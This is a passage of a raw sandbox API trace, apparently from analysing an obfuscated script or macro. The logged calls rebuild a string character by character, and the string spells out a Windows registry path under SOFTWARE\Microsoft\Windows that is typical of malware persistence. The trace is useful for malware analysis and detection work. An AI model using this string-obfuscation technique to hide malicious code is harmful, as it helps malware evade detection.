pvarResult=0x28f848) returned 0x0 [0166.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0166.825] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.826] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0166.826] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.826] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0166.826] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.833] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0166.833] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.833] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0166.834] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.834] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0166.834] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.835] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0166.835] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.836] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0166.836] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.836] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0166.836] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.837] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0166.837] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.838] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0166.838] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.838] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0166.839] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.839] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0166.839] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.840] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0166.840] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.841] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0166.841] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.841] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0166.842] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.846] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0166.847] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.847] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.847] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.848] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.848] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.849] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.849] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.850] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0166.850] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.850] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.851] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.851] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0166.851] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.852] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0166.852] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.853] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0166.853] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.854] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.854] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.854] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0166.855] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.855] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.855] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.856] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0166.856] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.857] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.857] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.857] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0166.924] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.925] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0166.925] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.926] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0166.926] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.926] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0166.927] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.927] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0166.927] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.928] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0166.928] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.928] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.928] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", 